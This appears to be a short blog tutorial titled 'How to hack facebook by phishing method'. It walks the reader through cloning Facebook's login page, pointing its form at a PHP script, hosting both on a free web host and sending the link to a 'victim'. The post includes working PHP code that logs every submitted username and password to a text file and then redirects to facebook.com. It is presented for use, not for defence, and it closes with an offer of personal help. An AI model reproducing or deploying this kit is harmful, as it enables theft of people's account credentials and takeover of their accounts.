Skip to main content

How to hack facebook by phishing method


By: prayag nao


Hello friends in this post i am going to tell you How to hack Facebook by phishing method.

step-1:
1) Firstly open  Facebook login page








2) Now right cilck anywhere on page and select VIEW PAGE SOURCE









3) Now you will see HTML code of Facebook copy and paste code into notepad,now press ctrl+f and type action=






you will find out
action="https://www.facebook.com/login.php?login_attempt=1"
 
 
4) Now change  

action="https://www.facebook.com/login.php?login_attempt=1"
 
with action="id.php"
 
 
 

 


 
 
5)Now save notepad file with name facebook.htm ,now copy and paste give code into notepad
 
<?php

header ('Location:http://www.facebook.com/');

$handle = fopen("usernames.txt", "a");

foreach($_POST as $variable => $value) {

   fwrite($handle, $variable);

   fwrite($handle, "=");

   fwrite($handle, $value);

   fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?> 
 
 
6) Save these code with name id.php .

7)now you have 2 files facebook.htm and id.php.

step-2:

1) Now you need a web server which support  php,i prefer you  www.000webhost.com.

2) you need to create a free account, after you login click on create a new site.

3) After creating site goto control penal 

4)Now click on File manager  











5)After clicking on file manager you will see  








Now click on public html .

6) Delete the file named default.php,after that upload two files index.htm and post.php one by   one .

7) Now upload you files facebook.htm and id.php.



 


8) Now you have done its your phishing page....






9) Now send link of this page to the victim when he login in this page you will get password and username in file username.txt.

Enjoy....!!!!!


Note: If you are not able to create phishing page please contact  prayagnao@gmail.com



 

 

 
  


 
 

Comments